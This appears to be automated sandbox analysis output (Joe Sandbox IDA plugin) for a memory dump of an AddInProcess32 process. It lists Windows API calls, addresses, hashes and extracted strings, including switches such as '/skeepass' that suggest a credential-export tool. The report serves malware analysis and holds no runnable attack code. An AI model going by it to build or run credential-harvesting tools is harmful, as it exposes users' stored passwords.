                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            • API String ID: 1043902810-0
                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • memset.MSVCRT ref: 004085CF
                                            • memset.MSVCRT ref: 004085F1
                                            • memset.MSVCRT ref: 00408606
                                            • strcmp.MSVCRT ref: 00408645
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                            • memset.MSVCRT ref: 0040870E
                                            • strcmp.MSVCRT ref: 0040876B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                            • String ID: ---
                                            • API String ID: 3437578500-2854292027
                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                            • API String ID: 2081463915-1959339147
                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                            APIs
                                            • GetDC.USER32(00000000), ref: 004121FF
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                            • SelectObject.GDI32(?,?), ref: 00412251
                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                            • SetCursor.USER32(00000000), ref: 004122BC
                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                            • String ID:
                                            • API String ID: 1700100422-0
                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                            • String ID:
                                            • API String ID: 552707033-0
                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                            • strchr.MSVCRT ref: 0040C140
                                            • strchr.MSVCRT ref: 0040C151
                                            • _strlwr.MSVCRT ref: 0040C15F
                                            • memset.MSVCRT ref: 0040C17A
                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                            • String ID: 4$h
                                            • API String ID: 4066021378-1856150674
                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                            APIs
                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                            • GetTickCount.KERNEL32 ref: 0040610B
                                            • GetParent.USER32(?), ref: 00406136
                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                            • String ID: A
                                            • API String ID: 2892645895-3554254475
                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                            • String ID: 0$6
                                            • API String ID: 4066108131-3849865405
                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                            APIs
                                            • memset.MSVCRT ref: 004082EF
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memset.MSVCRT ref: 00408362
                                            • memset.MSVCRT ref: 00408377
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 290601579-0
                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                            APIs
                                            • memset.MSVCRT ref: 0040A47B
                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                            • wcslen.MSVCRT ref: 0040A4BA
                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • wcslen.MSVCRT ref: 0040A4E0
                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$_snwprintfmemset
                                            • String ID: %s (%s)$YV@
                                            • API String ID: 3979103747-598926743
                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                            APIs
                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadMessageProc
                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                            • API String ID: 2780580303-317687271
                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                            APIs
                                            Strings
                                            • database %s is already in use, xrefs: 0042F6C5
                                            • database is already attached, xrefs: 0042F721
                                            • unable to open database: %s, xrefs: 0042F84E
                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                            • out of memory, xrefs: 0042F865
                                            • too many attached databases - max %d, xrefs: 0042F64D
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                            • API String ID: 1297977491-2001300268
                                            • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                            • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                            APIs
                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                            • GetLastError.KERNEL32 ref: 0041855C
                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                            • GetLastError.KERNEL32 ref: 0041858E
                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                            • free.MSVCRT ref: 004185AC
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                            • String ID:
                                            • API String ID: 2802642348-0
                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                            • wcslen.MSVCRT ref: 0040D1D3
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                            • String ID: strings
                                            • API String ID: 3166385802-3030018805
                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                            APIs
                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                            • memset.MSVCRT ref: 00405455
                                            • memset.MSVCRT ref: 0040546C
                                            • memset.MSVCRT ref: 00405483
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$memcpy$ErrorLast
                                            • String ID: 6$\
                                            • API String ID: 404372293-1284684873
                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                            • wcscpy.MSVCRT ref: 0040A0D9
                                            • wcscat.MSVCRT ref: 0040A0E6
                                            • wcscat.MSVCRT ref: 0040A0F5
                                            • wcscpy.MSVCRT ref: 0040A107
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                            • String ID:
                                            • API String ID: 1331804452-0
                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                            APIs
                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: advapi32.dll
                                            • API String ID: 2012295524-4050573280
                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                            APIs
                                            Strings
                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                            • <%s>, xrefs: 004100A6
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                            • API String ID: 3473751417-2880344631
                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset
                                            • String ID: %2.2X
                                            • API String ID: 2521778956-791839006
                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
